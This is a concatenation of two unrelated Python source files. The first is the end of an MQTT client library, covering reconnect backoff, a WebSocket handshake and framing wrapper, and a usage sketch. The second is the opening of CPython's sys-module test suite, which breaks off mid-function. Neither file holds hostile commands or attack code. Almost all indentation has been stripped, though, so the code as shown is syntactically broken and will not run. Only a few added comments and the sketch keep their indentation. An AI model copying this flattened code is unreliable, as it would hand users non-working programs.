with self._out_message_mutex:
if mid in self._out_messages:
# Only inform the client the message has been sent once.
rc = self._do_on_publish(mid)
return rc
return MQTT_ERR_SUCCESS
def _handle_on_message(self, message):
matched = False
with self._callback_mutex:
try:
topic = message.topic
except UnicodeDecodeError:
topic = None
if topic is not None:
for callback in self._on_message_filtered.iter_match(message.topic):
with self._in_callback_mutex:
callback(self, self._userdata, message)
matched = True
if matched == False and self.on_message:
with self._in_callback_mutex:
try:
self.on_message(self, self._userdata, message)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_message: %s', err)
def _thread_main(self):
self.loop_forever(retry_first_connection=True)
def _reconnect_wait(self):
# See reconnect_delay_set for details
now = time_func()
with self._reconnect_delay_mutex:
if self._reconnect_delay is None:
self._reconnect_delay = self._reconnect_min_delay
else:
self._reconnect_delay = min(
self._reconnect_delay * 2,
self._reconnect_max_delay,
)
target_time = now + self._reconnect_delay
remaining = target_time - now
while (self._state != mqtt_cs_disconnecting
and not self._thread_terminate
and remaining > 0):
time.sleep(min(remaining, 1))
remaining = target_time - time_func()
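    # Descriptive note: the delay above doubles on each failed attempt, starting
    # at _reconnect_min_delay and capped at _reconnect_max_delay (for a minimum
    # of 1 second: 1, 2, 4, 8, ... seconds), and the loop sleeps at most one
    # second at a time so disconnect() or thread termination is noticed quickly.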
# Compatibility class for easy porting from mosquitto.py.
class Mosquitto(Client):
def __init__(self, client_id="", clean_session=True, userdata=None):
super(Mosquitto, self).__init__(client_id, clean_session, userdata)
class WebsocketWrapper(object):
OPCODE_CONTINUATION = 0x0
OPCODE_TEXT = 0x1
OPCODE_BINARY = 0x2
OPCODE_CONNCLOSE = 0x8
OPCODE_PING = 0x9
OPCODE_PONG = 0xa
def __init__(self, socket, host, port, is_ssl, path, extra_headers):
self.connected = False
self._ssl = is_ssl
self._host = host
self._port = port
self._socket = socket
self._path = path
self._sendbuffer = bytearray()
self._readbuffer = bytearray()
self._requested_size = 0
self._payload_head = 0
self._readbuffer_head = 0
self._do_handshake(extra_headers)
def __del__(self):
self._sendbuffer = None
self._readbuffer = None
def _do_handshake(self, extra_headers):
sec_websocket_key = uuid.uuid4().bytes
sec_websocket_key = base64.b64encode(sec_websocket_key)
websocket_headers = {
"Host": "{self._host:s}:{self._port:d}".format(self=self),
"Upgrade": "websocket",
"Connection": "Upgrade",
"Origin": "https://{self._host:s}:{self._port:d}".format(self=self),
"Sec-WebSocket-Key": sec_websocket_key.decode("utf8"),
"Sec-Websocket-Version": "13",
"Sec-Websocket-Protocol": "mqtt",
}
# This is checked in ws_set_options so it will either be None, a
# dictionary, or a callable
if isinstance(extra_headers, dict):
websocket_headers.update(extra_headers)
elif callable(extra_headers):
websocket_headers = extra_headers(websocket_headers)
header = "\r\n".join([
"GET {self._path} HTTP/1.1".format(self=self),
"\r\n".join("{}: {}".format(i, j) for i, j in websocket_headers.items()),
"\r\n",
]).encode("utf8")
self._socket.send(header)
has_secret = False
has_upgrade = False
while True:
# read HTTP response header as lines
byte = self._socket.recv(1)
self._readbuffer.extend(byte)
# line end
if byte == b"\n":
if len(self._readbuffer) > 2:
# check upgrade
if b"connection" in str(self._readbuffer).lower().encode('utf-8'):
if b"upgrade" not in str(self._readbuffer).lower().encode('utf-8'):
raise WebsocketConnectionError("WebSocket handshake error, connection not upgraded")
else:
has_upgrade = True
# check key hash
if b"sec-websocket-accept" in str(self._readbuffer).lower().encode('utf-8'):
GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
server_hash = self._readbuffer.decode('utf-8').split(": ", 1)[1]
server_hash = server_hash.strip().encode('utf-8')
client_hash = sec_websocket_key.decode('utf-8') + GUID
client_hash = hashlib.sha1(client_hash.encode('utf-8'))
client_hash = base64.b64encode(client_hash.digest())
if server_hash != client_hash:
raise WebsocketConnectionError("WebSocket handshake error, invalid secret key")
else:
has_secret = True
else:
# ending linebreak
break
# reset linebuffer
self._readbuffer = bytearray()
# connection reset
elif not byte:
raise WebsocketConnectionError("WebSocket handshake error")
if not has_upgrade or not has_secret:
raise WebsocketConnectionError("WebSocket handshake error")
self._readbuffer = bytearray()
self.connected = True
def _create_frame(self, opcode, data, do_masking=1):
header = bytearray()
length = len(data)
mask_key = bytearray(os.urandom(4))
mask_flag = do_masking
        # 1 << 7 is the FIN (final) flag; we never send fragmented/continuation frames
header.append(1 << 7 | opcode)
if length < 126:
header.append(mask_flag << 7 | length)
elif length < 65536:
header.append(mask_flag << 7 | 126)
header += struct.pack("!H", length)
elif length < 0x8000000000000001:
header.append(mask_flag << 7 | 127)
header += struct.pack("!Q", length)
else:
raise ValueError("Maximum payload size is 2^63")
if mask_flag == 1:
for index in range(length):
data[index] ^= mask_key[index % 4]
data = mask_key + data
return header + data
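    # Worked example (illustrative): _create_frame(OPCODE_BINARY, bytearray(b"hello"))
    # produces header bytes 0x82 (FIN | binary opcode) and 0x85 (mask bit |
    # payload length 5), followed by the four random mask-key bytes and the
    # five payload bytes, each XOR-ed with mask_key[i % 4].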
def _buffered_read(self, length):
        # try to recv and store the needed bytes
wanted_bytes = length - (len(self._readbuffer) - self._readbuffer_head)
if wanted_bytes > 0:
data = self._socket.recv(wanted_bytes)
if not data:
raise socket.error(errno.ECONNABORTED, 0)
else:
self._readbuffer.extend(data)
if len(data) < wanted_bytes:
raise socket.error(EAGAIN, 0)
self._readbuffer_head += length
return self._readbuffer[self._readbuffer_head - length:self._readbuffer_head]
def _recv_impl(self, length):
# try to decode websocket payload part from data
try:
self._readbuffer_head = 0
result = None
chunk_startindex = self._payload_head
chunk_endindex = self._payload_head + length
header1 = self._buffered_read(1)
header2 = self._buffered_read(1)
opcode = (header1[0] & 0x0f)
maskbit = (header2[0] & 0x80) == 0x80
lengthbits = (header2[0] & 0x7f)
payload_length = lengthbits
mask_key = None
# read length
if lengthbits == 0x7e:
value = self._buffered_read(2)
payload_length, = struct.unpack("!H", value)
elif lengthbits == 0x7f:
value = self._buffered_read(8)
payload_length, = struct.unpack("!Q", value)
# read mask
if maskbit:
mask_key = self._buffered_read(4)
# if frame payload is shorter than the requested data, read only the possible part
readindex = chunk_endindex
if payload_length < readindex:
readindex = payload_length
if readindex > 0:
# get payload chunk
payload = self._buffered_read(readindex)
# unmask only the needed part
if maskbit:
for index in range(chunk_startindex, readindex):
payload[index] ^= mask_key[index % 4]
result = payload[chunk_startindex:readindex]
self._payload_head = readindex
else:
payload = bytearray()
# check if full frame arrived and reset readbuffer and payloadhead if needed
if readindex == payload_length:
self._readbuffer = bytearray()
self._payload_head = 0
            # respond to non-binary opcodes; their arrival is not guaranteed because the sockets are non-blocking
if opcode == WebsocketWrapper.OPCODE_CONNCLOSE:
frame = self._create_frame(WebsocketWrapper.OPCODE_CONNCLOSE, payload, 0)
self._socket.send(frame)
if opcode == WebsocketWrapper.OPCODE_PING:
frame = self._create_frame(WebsocketWrapper.OPCODE_PONG, payload, 0)
self._socket.send(frame)
if opcode == WebsocketWrapper.OPCODE_BINARY and payload_length > 0:
return result
else:
raise socket.error(EAGAIN, 0)
except socket.error as err:
if err.errno == errno.ECONNABORTED:
self.connected = False
return b''
else:
# no more data
raise
def _send_impl(self, data):
# if previous frame was sent successfully
if len(self._sendbuffer) == 0:
# create websocket frame
frame = self._create_frame(WebsocketWrapper.OPCODE_BINARY, bytearray(data))
self._sendbuffer.extend(frame)
self._requested_size = len(data)
# try to write out as much as possible
length = self._socket.send(self._sendbuffer)
self._sendbuffer = self._sendbuffer[length:]
if len(self._sendbuffer) == 0:
# buffer sent out completely, return with payload's size
return self._requested_size
else:
# couldn't send whole data, request the same data again with 0 as sent length
return 0
def recv(self, length):
return self._recv_impl(length)
def read(self, length):
return self._recv_impl(length)
def send(self, data):
return self._send_impl(data)
def write(self, data):
return self._send_impl(data)
def close(self):
self._socket.close()
def fileno(self):
return self._socket.fileno()
def pending(self):
        # Fix for bug #131: an SSL socket may still have data available
# for reading without select() being aware of it.
if self._ssl:
return self._socket.pending()
else:
            # a plain socket relies only on select()
return 0
def setblocking(self, flag):
self._socket.setblocking(flag)
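# Minimal usage sketch (illustration only): it assumes a broker listening on
# localhost:1883 and a hypothetical topic filter "sensors/#"; adjust both for
# a real deployment.
if __name__ == "__main__":
    def _on_connect(client, userdata, flags, rc):
        # Subscribe once the CONNACK arrives; rc == 0 means the connection
        # was accepted.
        if rc == 0:
            client.subscribe("sensors/#", qos=1)
    def _on_message(client, userdata, msg):
        # Print every PUBLISH delivered by the broker.
        print(msg.topic, msg.payload)
    _demo = Client(client_id="example-subscriber")
    _demo.on_connect = _on_connect
    _demo.on_message = _on_message
    _demo.connect("localhost", 1883, keepalive=60)
    _demo.loop_forever()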
|
test_sys.py
|
from test import support
from test.support.script_helper import assert_python_ok, assert_python_failure
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
@unittest.hasInfiniteRecursion
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (10, 25, 50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
self.assertRaises(RecursionError, f)
self.assertRaises(RecursionError, f)
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
@unittest.skipUnderCinderJIT("Recursion limit not enforced: T87011403")
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than the "lower-water
# mark". Otherwise, it may not be possible anymore to
# reset the overflowed flag to 0.
from _testcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
# formula extracted from _Py_RecursionLimitLowerWaterMark()
if limit > 200:
depth = limit - 50
else:
depth = limit * 3 // 4
set_recursion_limit_at_depth(depth, limit)
finally:
sys.setrecursionlimit(oldlimit)
@unittest.skipIfDebug("Recursion overflows the C stack in debug")
def test_recursionlimit_fatalerror(self):
# A fatal error occurs if a second recursion limit is hit when recovering
# from a first one.
code = textwrap.dedent("""
import sys
def f():
try:
f()
except RecursionError:
f()
sys.setrecursionlimit(%d)
f()""")
with test.support.SuppressCrashReport():
for i in (50, 1000):
sub = subprocess.Popen([sys.executable, '-c', code % i],
stderr=subprocess.PIPE)
err = sub.communicate()[1]
self.assertTrue(sub.returncode, sub.returncode)
self.assertIn(
b"Fatal Python error: Cannot recover from stack overflow",
err)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@test.support.reap_threads
@unittest.skipUnderCinderJIT("Incorrect line numbers: T63031461")
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# Make sure we signal t to end even if we exit early from a failed
# assertion.
try:
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved
# on to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
            # from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
finally:
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_user_site", "no_site", "ignore_environment", "verbose",
"bytes_warning", "quiet", "hash_randomization", "isolated",
"dev_mode", "utf8_mode")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type()
with self.assertRaises(TypeError):
attr_type.__new__(attr_type)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(test.support.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % test.support.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(test.support.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
        # has been set to a non-existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
